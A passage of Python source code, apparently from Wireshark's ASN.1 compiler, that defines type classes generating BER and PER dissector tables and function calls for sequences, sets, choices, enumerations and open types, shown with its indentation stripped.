e.val.AddTag(Tag(cls = 'CONTEXT', num = str(atag), mode = 'IMPLICIT'))
atag += 1
if autotag and hasattr(self, 'elt_list2'):
for e in (self.elt_list2):
e.val.AddTag(Tag(cls = 'CONTEXT', num = str(atag), mode = 'IMPLICIT'))
atag += 1
if autotag and hasattr(self, 'ext_list'):
for e in (self.ext_list):
e.val.AddTag(Tag(cls = 'CONTEXT', num = str(atag), mode = 'IMPLICIT'))
atag += 1
# register components
for e in (self.elt_list):
e.val.eth_reg(ident, ectx, tstrip=1, parent=ident)
if hasattr(self, 'ext_list'):
for e in (self.ext_list):
e.val.eth_reg(ident, ectx, tstrip=1, parent=ident)
if hasattr(self, 'elt_list2'):
for e in (self.elt_list2):
e.val.eth_reg(ident, ectx, tstrip=1, parent=ident)
def eth_type_default_table(self, ectx, tname):
#print "eth_type_default_table(tname='%s')" % (tname)
fname = ectx.eth_type[tname]['ref'][0]
table = "static const %(ER)s_sequence_t %(TABLE)s[] = {\n"
if hasattr(self, 'ext_list'):
ext = 'ASN1_EXTENSION_ROOT'
else:
ext = 'ASN1_NO_EXTENSIONS'
empty_ext_flag = '0'
if (len(self.elt_list)==0) and hasattr(self, 'ext_list') and (len(self.ext_list)==0) and (not hasattr(self, 'elt_list2') or (len(self.elt_list2)==0)):
empty_ext_flag = ext
for e in (self.elt_list):
f = fname + '/' + e.val.name
table += self.out_item(f, e.val, e.optional, ext, ectx)
if hasattr(self, 'ext_list'):
for e in (self.ext_list):
f = fname + '/' + e.val.name
table += self.out_item(f, e.val, e.optional, 'ASN1_NOT_EXTENSION_ROOT', ectx)
if hasattr(self, 'elt_list2'):
for e in (self.elt_list2):
f = fname + '/' + e.val.name
table += self.out_item(f, e.val, e.optional, ext, ectx)
if (ectx.Ber()):
table += " { NULL, 0, 0, 0, NULL }\n};\n"
else:
table += " { NULL, %s, 0, NULL }\n};\n" % (empty_ext_flag)
return table
#--- SeqOfType -----------------------------------------------------------
class SeqOfType (SqType):
def eth_type_default_table(self, ectx, tname):
#print "eth_type_default_table(tname='%s')" % (tname)
fname = ectx.eth_type[tname]['ref'][0]
if self.val.IsNamed ():
f = fname + '/' + self.val.name
else:
f = fname + '/' + ITEM_FIELD_NAME
table = "static const %(ER)s_sequence_t %(TABLE)s[1] = {\n"
table += self.out_item(f, self.val, False, 'ASN1_NO_EXTENSIONS', ectx)
table += "};\n"
return table
#--- SequenceOfType -----------------------------------------------------------
class SequenceOfType (SeqOfType):
def to_python (self, ctx):
# name, tag (None for no tag, EXPLICIT() for explicit), typ)
# or '' + (1,) for optional
sizestr = ''
if self.size_constr != None:
print("#Ignoring size constraint:", self.size_constr.subtype)
return "%sasn1.SEQUENCE_OF (%s%s)" % (ctx.spaces (),
self.val.to_python (ctx),
sizestr)
def eth_reg_sub(self, ident, ectx):
itmnm = ident
if not self.val.IsNamed ():
itmnm += '/' + ITEM_FIELD_NAME
self.val.eth_reg(itmnm, ectx, tstrip=1, idx='[##]', parent=ident)
def eth_tname(self):
if self.val.type != 'Type_Ref':
return '#' + self.type + '_' + str(id(self))
if not self.HasConstraint():
return "SEQUENCE_OF_" + self.val.eth_tname()
elif self.constr.IsSize():
return 'SEQUENCE_' + self.constr.eth_constrname() + '_OF_' + self.val.eth_tname()
else:
return '#' + self.type + '_' + str(id(self))
def eth_ftype(self, ectx):
return ('FT_UINT32', 'BASE_DEC')
def eth_need_tree(self):
return True
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_SEQUENCE')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
(pars['MIN_VAL'], pars['MAX_VAL'], pars['EXT']) = self.eth_get_size_constr(ectx)
pars['TABLE'] = '%(PROTOP)s%(TNAME)s_sequence_of'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
if (ectx.constraints_check and self.HasSizeConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_sequence_of', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(TABLE)s', '%(HF_INDEX)s', '%(ETT_INDEX)s',),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_sequence_of', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(TABLE)s', '%(HF_INDEX)s', '%(ETT_INDEX)s',),))
elif (ectx.Per() and not self.HasConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_sequence_of', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(ETT_INDEX)s', '%(TABLE)s',),))
elif (ectx.Per() and self.constr.type == 'Size'):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_sequence_of', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(ETT_INDEX)s', '%(TABLE)s',),
('%(MIN_VAL)s', '%(MAX_VAL)s','%(EXT)s'),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- SetOfType ----------------------------------------------------------------
class SetOfType (SeqOfType):
def eth_reg_sub(self, ident, ectx):
itmnm = ident
if not self.val.IsNamed ():
itmnm += '/' + ITEM_FIELD_NAME
self.val.eth_reg(itmnm, ectx, tstrip=1, idx='(##)', parent=ident)
def eth_tname(self):
if self.val.type != 'Type_Ref':
return '#' + self.type + '_' + str(id(self))
if not self.HasConstraint():
return "SET_OF_" + self.val.eth_tname()
elif self.constr.IsSize():
return 'SET_' + self.constr.eth_constrname() + '_OF_' + self.val.eth_tname()
else:
return '#' + self.type + '_' + str(id(self))
def eth_ftype(self, ectx):
return ('FT_UINT32', 'BASE_DEC')
def eth_need_tree(self):
return True
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_SET')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
(pars['MIN_VAL'], pars['MAX_VAL'], pars['EXT']) = self.eth_get_size_constr(ectx)
pars['TABLE'] = '%(PROTOP)s%(TNAME)s_set_of'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
if (ectx.constraints_check and self.HasSizeConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_set_of', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(TABLE)s', '%(HF_INDEX)s', '%(ETT_INDEX)s',),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_set_of', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(TABLE)s', '%(HF_INDEX)s', '%(ETT_INDEX)s',),))
elif (ectx.Per() and not self.HasConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_set_of', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(ETT_INDEX)s', '%(TABLE)s',),))
elif (ectx.Per() and self.constr.type == 'Size'):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_set_of', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(ETT_INDEX)s', '%(TABLE)s',),
('%(MIN_VAL)s', '%(MAX_VAL)s','%(EXT)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
def mk_tag_str (ctx, cls, typ, num):
# XXX should do conversion to int earlier!
val = int (num)
typ = typ.upper()
if typ == 'DEFAULT':
typ = ctx.tags_def
return 'asn1.%s(%d,cls=asn1.%s_FLAG)' % (typ, val, cls) # XXX still ned
#--- SequenceType -------------------------------------------------------------
class SequenceType (SeqType):
def to_python (self, ctx):
# name, tag (None for no tag, EXPLICIT() for explicit), typ)
# or '' + (1,) for optional
# XXX should also collect names for SEQUENCE inside SEQUENCE or
# CHOICE or SEQUENCE_OF (where should the SEQUENCE_OF name come
# from? for others, element or arm name would be fine)
seq_name = getattr (self, 'sequence_name', None)
if seq_name == None:
seq_name = 'None'
else:
seq_name = "'" + seq_name + "'"
if 'ext_list' in self.__dict__:
return "%sasn1.SEQUENCE ([%s], ext=[%s], seq_name = %s)" % (ctx.spaces (),
self.elts_to_py (self.elt_list, ctx),
self.elts_to_py (self.ext_list, ctx), seq_name)
else:
return "%sasn1.SEQUENCE ([%s]), seq_name = %s" % (ctx.spaces (),
self.elts_to_py (self.elt_list, ctx), seq_name)
def elts_to_py (self, list, ctx):
# we have elt_type, val= named_type, maybe default=, optional=
# named_type node: either ident = or typ =
# need to dismember these in order to generate Python output syntax.
ctx.indent ()
def elt_to_py (e):
assert (e.type == 'elt_type')
nt = e.val
optflag = e.optional
#assert (not hasattr (e, 'default')) # XXX add support for DEFAULT!
assert (nt.type == 'named_type')
tagstr = 'None'
identstr = nt.ident
if hasattr (nt.typ, 'type') and nt.typ.type == 'tag': # ugh
tagstr = mk_tag_str (ctx,nt.typ.tag.cls,
nt.typ.tag.tag_typ,nt.typ.tag.num)
nt = nt.typ
return "('%s',%s,%s,%d)" % (identstr, tagstr,
nt.typ.to_python (ctx), optflag)
indentstr = ",\n" + ctx.spaces ()
rv = indentstr.join ([elt_to_py (e) for e in list])
ctx.outdent ()
return rv
def eth_need_tree(self):
return True
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_SEQUENCE')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
pars['TABLE'] = '%(PROTOP)s%(TNAME)s_sequence'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_sequence', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(TABLE)s', '%(HF_INDEX)s', '%(ETT_INDEX)s',),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_sequence', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(ETT_INDEX)s', '%(TABLE)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- ExtensionAdditionGroup ---------------------------------------------------
class ExtensionAdditionGroup (SeqType):
def __init__(self,*args, **kw) :
self.parent_ident = None
self.parent_tname = None
SeqType.__init__ (self,*args, **kw)
def eth_omit_field(self):
return True
def eth_tname(self):
if (self.parent_tname and self.IsNamed()):
return self.parent_tname + "_" + self.name
else:
return SeqType.eth_tname(self)
def eth_reg_sub(self, ident, ectx):
ectx.eth_dummy_eag_field_required()
ectx.eth_dep_add(self.parent_ident, ident)
SeqType.eth_reg_sub(self, ident, ectx)
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
pars['TABLE'] = '%(PROTOP)s%(TNAME)s_sequence'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_sequence_eag', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(TABLE)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- SetType ------------------------------------------------------------------
class SetType (SeqType):
def eth_need_tree(self):
return True
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_SET')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
pars['TABLE'] = '%(PROTOP)s%(TNAME)s_set'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_set', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(TABLE)s', '%(HF_INDEX)s', '%(ETT_INDEX)s',),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_set', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(ETT_INDEX)s', '%(TABLE)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- ChoiceType ---------------------------------------------------------------
class ChoiceType (Type):
def to_python (self, ctx):
# name, tag (None for no tag, EXPLICIT() for explicit), typ)
# or '' + (1,) for optional
if 'ext_list' in self.__dict__:
return "%sasn1.CHOICE ([%s], ext=[%s])" % (ctx.spaces (),
self.elts_to_py (self.elt_list, ctx),
self.elts_to_py (self.ext_list, ctx))
else:
return "%sasn1.CHOICE ([%s])" % (ctx.spaces (), self.elts_to_py (self.elt_list, ctx))
def elts_to_py (self, list, ctx):
ctx.indent ()
def elt_to_py (nt):
assert (nt.type == 'named_type')
tagstr = 'None'
if hasattr (nt, 'ident'):
identstr = nt.ident
else:
if hasattr (nt.typ, 'val'):
identstr = nt.typ.val # XXX, making up name
elif hasattr (nt.typ, 'name'):
identstr = nt.typ.name
else:
identstr = ctx.make_new_name ()
if hasattr (nt.typ, 'type') and nt.typ.type == 'tag': # ugh
tagstr = mk_tag_str (ctx,nt.typ.tag.cls,
nt.typ.tag.tag_typ,nt.typ.tag.num)
nt = nt.typ
return "('%s',%s,%s)" % (identstr, tagstr,
nt.typ.to_python (ctx))
indentstr = ",\n" + ctx.spaces ()
rv = indentstr.join ([elt_to_py (e) for e in list])
ctx.outdent ()
return rv
def eth_reg_sub(self, ident, ectx):
#print "eth_reg_sub(ident='%s')" % (ident)
# check if autotag is required
autotag = False
if (ectx.NeedTags() and (ectx.tag_def == 'AUTOMATIC')):
autotag = True
for e in (self.elt_list):
if e.HasOwnTag(): autotag = False; break;
if autotag and hasattr(self, 'ext_list'):
for e in (self.ext_list):
if e.HasOwnTag(): autotag = False; break;
# do autotag
if autotag:
atag = 0
for e in (self.elt_list):
e.AddTag(Tag(cls = 'CONTEXT', num = str(atag), mode = 'IMPLICIT'))
atag += 1
if autotag and hasattr(self, 'ext_list'):
for e in (self.ext_list):
e.AddTag(Tag(cls = 'CONTEXT', num = str(atag), mode = 'IMPLICIT'))
atag += 1
for e in (self.elt_list):
e.eth_reg(ident, ectx, tstrip=1, parent=ident)
if ectx.conform.check_item('EXPORTS', ident + '.' + e.name):
ectx.eth_sel_req(ident, e.name)
if hasattr(self, 'ext_list'):
for e in (self.ext_list):
e.eth_reg(ident, ectx, tstrip=1, parent=ident)
if ectx.conform.check_item('EXPORTS', ident + '.' + e.name):
ectx.eth_sel_req(ident, e.name)
def sel_item(self, ident, sel, ectx):
lst = self.elt_list[:]
if hasattr(self, 'ext_list'):
lst.extend(self.ext_list)
ee = None
for e in (self.elt_list):
if e.IsNamed() and (e.name == sel):
ee = e
break
if not ee:
print("#CHOICE %s does not contain item %s" % (ident, sel))
return ee
def sel_req(self, ident, sel, ectx):
#print "sel_req(ident='%s', sel=%s)\n%s" % (ident, sel, str(self))
ee = self.sel_item(ident, sel, ectx)
if ee:
ee.eth_reg(ident, ectx, tstrip=0, selflag=True)
def eth_ftype(self, ectx):
return ('FT_UINT32', 'BASE_DEC')
def eth_ftype_sel(self, sel, ectx):
ee = self.sel_item('', sel, ectx)
if ee:
return ee.eth_ftype(ectx)
else:
return ('FT_NONE', 'BASE_NONE')
def eth_strings(self):
return '$$'
def eth_need_tree(self):
return True
def eth_has_vals(self):
return True
def GetTTag(self, ectx):
lst = self.elt_list
cls = 'BER_CLASS_ANY/*choice*/'
#if hasattr(self, 'ext_list'):
# lst.extend(self.ext_list)
#if (len(lst) > 0):
# cls = lst[0].GetTag(ectx)[0]
#for e in (lst):
# if (e.GetTag(ectx)[0] != cls):
# cls = '-1/*choice*/'
return (cls, '-1/*choice*/')
def GetTTagSel(self, sel, ectx):
ee = self.sel_item('', sel, ectx)
if ee:
return ee.GetTag(ectx)
else:
return ('BER_CLASS_ANY/*unknown selection*/', '-1/*unknown selection*/')
def IndetermTag(self, ectx):
#print "Choice IndetermTag()=%s" % (str(not self.HasOwnTag()))
return not self.HasOwnTag()
def detect_tagval(self, ectx):
tagval = False
lst = self.elt_list[:]
if hasattr(self, 'ext_list'):
lst.extend(self.ext_list)
if (len(lst) > 0) and (not ectx.Per() or lst[0].HasOwnTag()):
t = lst[0].GetTag(ectx)[0]
tagval = True
else:
t = ''
tagval = False
if (t == 'BER_CLASS_UNI'):
tagval = False
for e in (lst):
if not ectx.Per() or e.HasOwnTag():
tt = e.GetTag(ectx)[0]
else:
tt = ''
tagval = False
if (tt != t):
tagval = False
return tagval
def get_vals(self, ectx):
tagval = self.detect_tagval(ectx)
vals = []
cnt = 0
for e in (self.elt_list):
if (tagval): val = e.GetTag(ectx)[1]
else: val = str(cnt)
vals.append((val, e.name))
cnt += 1
if hasattr(self, 'ext_list'):
for e in (self.ext_list):
if (tagval): val = e.GetTag(ectx)[1]
else: val = str(cnt)
vals.append((val, e.name))
cnt += 1
return vals
def eth_type_vals(self, tname, ectx):
out = '\n'
vals = self.get_vals(ectx)
out += ectx.eth_vals(tname, vals)
return out
def reg_enum_vals(self, tname, ectx):
vals = self.get_vals(ectx)
for (val, id) in vals:
ectx.eth_reg_value(id, self, val, ethname=ectx.eth_enum_item(tname, id))
def eth_type_enum(self, tname, ectx):
out = '\n'
vals = self.get_vals(ectx)
out += ectx.eth_enum(tname, vals)
return out
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
pars['TABLE'] = '%(PROTOP)s%(TNAME)s_choice'
return pars
def eth_type_default_table(self, ectx, tname):
def out_item(val, e, ext, ectx):
has_enum = ectx.eth_type[tname]['enum'] & EF_ENUM
if (has_enum):
vval = ectx.eth_enum_item(tname, e.name)
else:
vval = val
f = fname + '/' + e.name
ef = ectx.field[f]['ethname']
t = ectx.eth_hf[ef]['ethtype']
if (ectx.Ber()):
opt = ''
if (not e.HasOwnTag()):
opt = 'BER_FLAGS_NOOWNTAG'
elif (e.HasImplicitTag(ectx)):
if (opt): opt += '|'
opt += 'BER_FLAGS_IMPLTAG'
if (not opt): opt = '0'
if (ectx.Ber()):
(tc, tn) = e.GetTag(ectx)
out = ' { %3s, %-24s, %-13s, %s, %s, dissect_%s_%s },\n' \
% (vval, '&'+ectx.eth_hf[ef]['fullname'], tc, tn, opt, ectx.eth_type[t]['proto'], t)
elif (ectx.Per()):
out = ' { %3s, %-24s, %-23s, dissect_%s_%s },\n' \
% (vval, '&'+ectx.eth_hf[ef]['fullname'], ext, ectx.eth_type[t]['proto'], t)
else:
out = ''
return out
# end out_item()
#print "eth_type_default_table(tname='%s')" % (tname)
fname = ectx.eth_type[tname]['ref'][0]
tagval = self.detect_tagval(ectx)
table = "static const %(ER)s_choice_t %(TABLE)s[] = {\n"
cnt = 0
if hasattr(self, 'ext_list'):
ext = 'ASN1_EXTENSION_ROOT'
else:
ext = 'ASN1_NO_EXTENSIONS'
empty_ext_flag = '0'
if (len(self.elt_list)==0) and hasattr(self, 'ext_list') and (len(self.ext_list)==0):
empty_ext_flag = ext
for e in (self.elt_list):
if (tagval): val = e.GetTag(ectx)[1]
else: val = str(cnt)
table += out_item(val, e, ext, ectx)
cnt += 1
if hasattr(self, 'ext_list'):
for e in (self.ext_list):
if (tagval): val = e.GetTag(ectx)[1]
else: val = str(cnt)
table += out_item(val, e, 'ASN1_NOT_EXTENSION_ROOT', ectx)
cnt += 1
if (ectx.Ber()):
table += " { 0, NULL, 0, 0, 0, NULL }\n};\n"
else:
table += " { 0, NULL, %s, NULL }\n};\n" % (empty_ext_flag)
return table
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_choice', ret='offset',
par=(('%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(TABLE)s', '%(HF_INDEX)s', '%(ETT_INDEX)s'),
('%(VAL_PTR)s',),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_choice', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(ETT_INDEX)s', '%(TABLE)s',),
('%(VAL_PTR)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- ChoiceValue ----------------------------------------------------
class ChoiceValue (Value):
def to_str(self, ectx):
return self.val.to_str(ectx)
def fld_obj_eq(self, other):
return isinstance(other, ChoiceValue) and (self.choice == other.choice) and (str(self.val.val) == str(other.val.val))
#--- EnumeratedType -----------------------------------------------------------
class EnumeratedType (Type):
def to_python (self, ctx):
def strify_one (named_num):
return "%s=%s" % (named_num.ident, named_num.val)
return "asn1.ENUM(%s)" % ",".join (map (strify_one, self.val))
def eth_ftype(self, ectx):
return ('FT_UINT32', 'BASE_DEC')
def eth_strings(self):
return '$$'
def eth_has_vals(self):
return True
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_ENUMERATED')
def get_vals_etc(self, ectx):
vals = []
lastv = 0
used = {}
maxv = 0
root_num = 0
ext_num = 0
map_table = []
for e in (self.val):
if e.type == 'NamedNumber':
used[int(e.val)] = True
for e in (self.val):
if e.type == 'NamedNumber':
val = int(e.val)
else:
while lastv in used:
lastv += 1
val = lastv
used[val] = True
vals.append((val, e.ident))
map_table.append(val)
root_num += 1
if val > maxv:
maxv = val
if self.ext is not None:
for e in (self.ext):
if e.type == 'NamedNumber':
used[int(e.val)] = True
for e in (self.ext):
if e.type == 'NamedNumber':
val = int(e.val)
else:
while lastv in used:
lastv += 1
val = lastv
used[val] = True
vals.append((val, e.ident))
map_table.append(val)
ext_num += 1
if val > maxv:
maxv = val
need_map = False
for i in range(len(map_table)):
need_map = need_map or (map_table[i] != i)
if (not need_map):
map_table = None
return (vals, root_num, ext_num, map_table)
def eth_type_vals(self, tname, ectx):
out = '\n'
vals = self.get_vals_etc(ectx)[0]
out += ectx.eth_vals(tname, vals)
return out
def reg_enum_vals(self, tname, ectx):
vals = self.get_vals_etc(ectx)[0]
for (val, id) in vals:
ectx.eth_reg_value(id, self, val, ethname=ectx.eth_enum_item(tname, id))
def eth_type_enum(self, tname, ectx):
out = '\n'
vals = self.get_vals_etc(ectx)[0]
out += ectx.eth_enum(tname, vals)
return out
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
(root_num, ext_num, map_table) = self.get_vals_etc(ectx)[1:]
if (self.ext != None):
ext = 'TRUE'
else:
ext = 'FALSE'
pars['ROOT_NUM'] = str(root_num)
pars['EXT'] = ext
pars['EXT_NUM'] = str(ext_num)
if (map_table):
pars['TABLE'] = '%(PROTOP)s%(TNAME)s_value_map'
else:
pars['TABLE'] = 'NULL'
return pars
def eth_type_default_table(self, ectx, tname):
if (not ectx.Per()): return ''
map_table = self.get_vals_etc(ectx)[3]
if (map_table == None): return ''
table = "static guint32 %(TABLE)s[%(ROOT_NUM)s+%(EXT_NUM)s] = {"
table += ", ".join([str(v) for v in map_table])
table += "};\n"
return table
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
if (ectx.constraints_check and self.HasValueConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_integer', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_integer', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s'),
('%(VAL_PTR)s',),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_enumerated', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(ROOT_NUM)s', '%(VAL_PTR)s', '%(EXT)s', '%(EXT_NUM)s', '%(TABLE)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- EmbeddedPDVType -----------------------------------------------------------
class EmbeddedPDVType (Type):
def eth_tname(self):
return 'EMBEDDED_PDV'
def eth_ftype(self, ectx):
return ('FT_NONE', 'BASE_NONE')
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_EMBEDDED_PDV')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
if ectx.default_embedded_pdv_cb:
pars['TYPE_REF_FN'] = ectx.default_embedded_pdv_cb
else:
pars['TYPE_REF_FN'] = 'NULL'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_EmbeddedPDV_Type', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(HF_INDEX)s', '%(TYPE_REF_FN)s',),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_embedded_pdv', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(TYPE_REF_FN)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- ExternalType -----------------------------------------------------------
class ExternalType (Type):
def eth_tname(self):
return 'EXTERNAL'
def eth_ftype(self, ectx):
return ('FT_NONE', 'BASE_NONE')
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_EXTERNAL')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
if ectx.default_external_type_cb:
pars['TYPE_REF_FN'] = ectx.default_external_type_cb
else:
pars['TYPE_REF_FN'] = 'NULL'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_external_type', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(HF_INDEX)s', '%(TYPE_REF_FN)s',),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_external_type', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(TYPE_REF_FN)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- OpenType -----------------------------------------------------------
class OpenType (Type):
def to_python (self, ctx):
return "asn1.ANY"
def single_type(self):
if (self.HasConstraint() and
self.constr.type == 'Type' and
self.constr.subtype.type == 'Type_Ref'):
return self.constr.subtype.val
return None
def eth_reg_sub(self, ident, ectx):
t = self.single_type()
if t:
ectx.eth_dep_add(ident, t)
def eth_tname(self):
t = self.single_type()
if t:
return 'OpenType_' + t
else:
return Type.eth_tname(self)
def eth_ftype(self, ectx):
return ('FT_NONE', 'BASE_NONE')
def GetTTag(self, ectx):
return ('BER_CLASS_ANY', '0')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
pars['FN_VARIANT'] = ectx.default_opentype_variant
t = self.single_type()
if t:
t = ectx.type[t]['ethname']
pars['TYPE_REF_PROTO'] = ectx.eth_type[t]['proto']
pars['TYPE_REF_TNAME'] = t
pars['TYPE_REF_FN'] = 'dissect_%(TYPE_REF_PROTO)s_%(TYPE_REF_TNAME)s'
else:
pars['TYPE_REF_FN'] = 'NULL'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_open_type%(FN_VARIANT)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(TYPE_REF_FN)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- InstanceOfType -----------------------------------------------------------
class InstanceOfType (Type):
def eth_tname(self):
return 'INSTANCE_OF'
def eth_ftype(self, ectx):
return ('FT_NONE', 'BASE_NONE')
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_EXTERNAL')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
if ectx.default_external_type_cb:
pars['TYPE_REF_FN'] = ectx.default_external_type_cb
else:
pars['TYPE_REF_FN'] = 'NULL'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_external_type', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(HF_INDEX)s', '%(TYPE_REF_FN)s',),))
elif (ectx.Per()):
body = '#error Can not decode %s' % (tname)
else:
body = '#error Can not decode %s' % (tname)
return body
#--- AnyType -----------------------------------------------------------
class AnyType (Type):
def to_python (self, ctx):
return "asn1.ANY"
def eth_ftype(self, ectx):
return ('FT_NONE', 'BASE_NONE')
def GetTTag(self, ectx):
return ('BER_CLASS_ANY', '0')
def eth_type_default_body(self, ectx, tname):
body = '#error Can not decode %s' % (tname)
return body
class Literal (Node):
def to_python (self, ctx):
return self.val
#--- NullType -----------------------------------------------------------------
class NullType (Type):
def to_python (self, ctx):
return 'asn1.NULL'
def eth_tname(self):
return 'NULL'
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_NULL')
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
